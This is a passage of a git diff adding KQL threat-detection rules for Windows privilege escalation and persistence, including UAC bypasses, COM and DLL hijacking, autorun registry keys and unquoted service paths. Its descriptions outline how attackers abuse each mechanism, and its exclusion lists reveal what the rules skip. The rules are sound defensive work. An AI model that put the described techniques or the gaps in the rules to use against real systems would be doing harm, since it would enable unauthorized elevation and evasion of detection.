at end of file diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql new file mode 100644 index 00000000..0ba67225 --- /dev/null +++ b/KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql @@ -0,0 +1,10 @@ +// Title: Bypass UAC Using Event Viewer +// Author: frack113 +// Date: 2022-01-05 +// Level: high +// Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010 + +DeviceRegistryEvents +| where RegistryKey endswith "_Classes\\mscfile\\shell\\open\\command\\(Default)" and (not(RegistryValueData startswith "%SystemRoot%\\system32\\mmc.exe \"%1\" %")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql new file mode 100644 index 00000000..6a19b8be --- /dev/null +++ b/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql @@ -0,0 +1,13 @@ +// Title: Bypass UAC Using SilentCleanup Task +// Author: frack113, Nextron Systems +// Date: 2022-01-06 +// Level: high +// Description: Detects the setting of the environement variable "windir" to a non default value. +Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. +The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceRegistryEvents +| where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql b/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql new file mode 100644 index 00000000..8d614901 --- /dev/null +++ b/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql @@ -0,0 +1,12 @@ +// Title: Bypass UAC via CMSTP +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002, attack.t1218.003 +// False Positives: +// - Legitimate use of cmstp.exe utility by legitimate user + +DeviceProcessEvents +| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql b/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql new file mode 100644 index 00000000..3ecc9937 --- /dev/null +++ b/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql @@ -0,0 +1,12 @@ +// Title: Bypass UAC via WSReset.exe +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth +// Date: 2019-10-24 +// Level: high +// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 +// False Positives: +// - Unknown sub processes of Wsreset.exe + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql b/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql new file mode 100644 index 00000000..7382ef34 --- /dev/null +++ b/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql @@ -0,0 +1,12 @@ +// Title: Change Default File Association To Executable Via Assoc +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects when a program changes the default file association of any extension to an executable. +When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "assoc " and ProcessCommandLine contains "exefile") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) and (not(ProcessCommandLine contains ".exe=exefile")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql b/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql new file mode 100644 index 00000000..b8ab39a8 --- /dev/null +++ b/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql @@ -0,0 +1,14 @@ +// Title: Change Default File Association Via Assoc +// Author: Timur Zinniatullin, oscd.community +// Date: 2019-10-21 +// Level: low +// Description: Detects file association changes using the builtin "assoc" command. +When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001 +// False Positives: +// - Admin activity + +DeviceProcessEvents +| where ProcessCommandLine contains "assoc" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql b/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql new file mode 100644 index 00000000..84d3564d --- /dev/null +++ b/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql @@ -0,0 +1,13 @@ +// Title: Changing Existing Service ImagePath Value Via Reg.EXE +// Author: frack113 +// Date: 2021-12-30 +// Level: medium +// Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. +Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. +Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.011 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "add " and ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Services\\" and ProcessCommandLine contains " ImagePath ") and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " /d " or ProcessCommandLine contains " –d " or ProcessCommandLine contains " —d " or ProcessCommandLine contains " ―d ") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql new file mode 100644 index 00000000..6cf0b25b --- /dev/null +++ b/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: Classes Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\Software\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\Shellex\\ColumnHandlers" or RegistryKey contains "\\Filter" or RegistryKey contains "\\Exefile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\.exe" or RegistryKey contains "\\.cmd" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers")) and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or RegistryValueData =~ "(Empty)" or isnull(RegistryValueData) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and RegistryKey endswith "\\lnkfile\\shellex\\ContextMenuHandlers*")))) and (not(RegistryValueData =~ "{807583E5-5146-11D5-A672-00B0D022E945}")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql b/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql new file mode 100644 index 00000000..1cebb162 --- /dev/null +++ b/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql @@ -0,0 +1,12 @@ +// Title: COM Hijacking via TreatAs +// Author: frack113 +// Date: 2022-08-28 +// Level: medium +// Description: Detect modification of TreatAs key to enable "rundll32.exe -sta" command +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Legitimate use + +DeviceRegistryEvents +| where RegistryKey endswith "TreatAs\\(Default)" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql b/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql new file mode 100644 index 00000000..24b51adb --- /dev/null +++ b/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql @@ -0,0 +1,12 @@ +// Title: COM Object Hijacking Via Modification Of Default System CLSID Default Value +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-16 +// Level: high +// Description: Detects potential COM object hijacking via modification of default system CLSID. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where ((RegistryKey endswith "\\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}*" or RegistryKey endswith "\\{2155fee3-2419-4373-b102-6843707eb41f}*" or RegistryKey endswith "\\{4590f811-1d3a-11d0-891f-00aa004b2e24}*" or RegistryKey endswith "\\{4de225bf-cf59-4cfc-85f7-68b90f185355}*" or RegistryKey endswith "\\{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}*" or RegistryKey endswith "\\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}*" or RegistryKey endswith "\\{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}*" or RegistryKey endswith "\\{7849596a-48ea-486e-8937-a2a3009f31a9}*" or RegistryKey endswith "\\{0b91a74b-ad7c-4a9d-b563-29eef9167172}*" or RegistryKey endswith "\\{603D3801-BD81-11d0-A3A5-00C04FD706EC}*" or RegistryKey endswith "\\{30D49246-D217-465F-B00B-AC9DDD652EB7}*" or RegistryKey endswith "\\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}*" or RegistryKey endswith "\\{2227A280-3AEA-1069-A2DE-08002B30309D}*" or RegistryKey endswith "\\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}*" or RegistryKey endswith "\\{AA509086-5Ca9-4C25-8F95-589D3C07B48A}*") and (RegistryKey endswith "\\CLSID*" and (RegistryKey endswith "\\InprocServer32\\(Default)" or RegistryKey endswith "\\LocalServer32\\(Default)"))) and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains "\\AppData\\Local\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or RegistryValueData contains "\\System32\\spool\\drivers\\color\\" or RegistryValueData contains "\\Temporary Internet" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%appdata%" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql new file mode 100644 index 00000000..39c14ca1 --- /dev/null +++ b/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: Common Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart" or RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect" or RegistryKey contains "\\SYSTEM\\Setup\\CmdLine" or RegistryKey contains "\\Software\\Microsoft\\Ctf\\LangBarAddin" or RegistryKey contains "\\Software\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Handler" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Filter" or RegistryKey contains "\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Environment\\UserInitMprLogonScript" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Internet Explorer\\Desktop\\Components" or RegistryKey contains "\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32" or RegistryKey contains "\\Control Panel\\Desktop\\Scrnsave.exe") and (not((RegistryValueData =~ "(Empty)" or isnull(RegistryValueData) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe"))) and (not((RegistryKey contains "\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4383}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{8A69D345-D564-463c-AFF1-A69D9E530F96}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe")) or ((RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Classes\\PROTOCOLS\\Handler*" or RegistryKey endswith "\\ClickToRunStore\\HKMU\\SOFTWARE\\Classes\\PROTOCOLS\\Handler*") or (RegistryValueData in~ ("{314111c7-a502-11d2-bbca-00c04f8ec294}", "{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}", "{42089D2D-912D-4018-9087-2B87803E93FB}", "{5504BE45-A83B-4808-900A-3A5C36E7F77A}", "{807583E5-5146-11D5-A672-00B0D022E945}"))) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/control_panel_items.kql b/KQL/rules/Privilege Escalation/control_panel_items.kql new file mode 100644 index 00000000..73d6ffb7 --- /dev/null +++ b/KQL/rules/Privilege Escalation/control_panel_items.kql @@ -0,0 +1,10 @@ +// Title: Control Panel Items +// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_) +// Date: 2020-06-22 +// Level: high +// Description: Detects the malicious use of a control panel item +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.t1218.002, attack.persistence, attack.t1546 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|"))))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql b/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql new file mode 100644 index 00000000..de77d3a8 --- /dev/null +++ b/KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql @@ -0,0 +1,10 @@ +// Title: Created Files by Microsoft Sync Center +// Author: elhoim +// Date: 2022-04-28 +// Level: medium +// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql b/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql new file mode 100644 index 00000000..01284022 --- /dev/null +++ b/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql @@ -0,0 +1,12 @@ +// Title: Creation Exe for Service with Unquoted Path +// Author: frack113 +// Date: 2021-12-30 +// Level: high +// Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. +Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 + +DeviceFileEvents +| where FolderPath =~ "C:\\program.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql b/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql new file mode 100644 index 00000000..6d865550 --- /dev/null +++ b/KQL/rules/Privilege Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql @@ -0,0 +1,10 @@ +// Title: Creation of WerFault.exe/Wer.dll in Unusual Folder +// Author: frack113 +// Date: 2022-05-09 +// Level: medium +// Description: Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 + +DeviceFileEvents +| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql new file mode 100644 index 00000000..421bf996 --- /dev/null +++ b/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: CurrentControlSet Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control" and (RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\Terminal Server\\Wds\\rdpwd\\StartupPrograms" or RegistryKey contains "\\SecurityProviders\\SecurityProviders" or RegistryKey contains "\\SafeBoot\\AlternateShell" or RegistryKey contains "\\Print\\Providers" or RegistryKey contains "\\Print\\Monitors" or RegistryKey contains "\\NetworkProvider\\Order" or RegistryKey contains "\\Lsa\\Notification Packages" or RegistryKey contains "\\Lsa\\Authentication Packages" or RegistryKey contains "\\BootVerificationProgram\\ImagePath")) and (not((((RegistryValueData in~ ("cpwmon64_v40.dll", "CutePDF Writer")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Print\\Monitors\\CutePDF Writer Monitor") or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey endswith "\\NetworkProvider\\Order\\ProviderOrder") or (RegistryValueData =~ "VNCpm.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey endswith "\\Print\\Monitors\\MONVNC\\Driver")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql new file mode 100644 index 00000000..78b4aadd --- /dev/null +++ b/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: CurrentVersion Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Policies\\System\\Shell" or RegistryKey contains "\\Policies\\Explorer\\Run" or RegistryKey contains "\\Group Policy\\Scripts\\Startup" or RegistryKey contains "\\Group Policy\\Scripts\\Shutdown" or RegistryKey contains "\\Group Policy\\Scripts\\Logon" or RegistryKey contains "\\Group Policy\\Scripts\\Logoff" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects" or RegistryKey contains "\\Authentication\\PLAP Providers" or RegistryKey contains "\\Authentication\\Credential Providers" or RegistryKey contains "\\Authentication\\Credential Provider Filters")) and (not(((RegistryValueData =~ "ctfmon.exe /n" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\userinit.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe") or (RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\NgcFirst\\ConsecutiveSwitchCount" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\WebEx\\WebexHost.exe") or (InitiatingProcessFolderPath in~ ("C:\\WINDOWS\\system32\\devicecensus.exe", "C:\\Windows\\system32\\winsat.exe", "C:\\Program Files\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe", "C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe", "C:\\Program Files\\Everything\\Everything.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\LogonUI.exe" and (RegistryKey endswith "\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}*")) or isnull(RegistryValueData) or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart " and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe")))) and (not(((RegistryValueData =~ "Binary Data" and (InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\avgToolsSvc.exe", "C:\\Program Files (x86)\\AVG\\Antivirus\\avgToolsSvc.exe")) and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run*") or ((RegistryValueData in~ ("\"C:\\Program Files\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "{472083B0-C522-11CF-8763-00608CC02F24}", "{472083B1-C522-11CF-8763-00608CC02F24}")) and (InitiatingProcessFolderPath contains "C:\\Program Files\\AVG\\Antivirus\\Setup\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\AVG\\Antivirus\\Setup\\" or InitiatingProcessFolderPath contains "\\instup.exe")) or ((RegistryValueData in~ ("\"C:\\Program Files\\Avast Software\\Avast\\AvLaunch.exe\" /gui", "\"C:\\Program Files 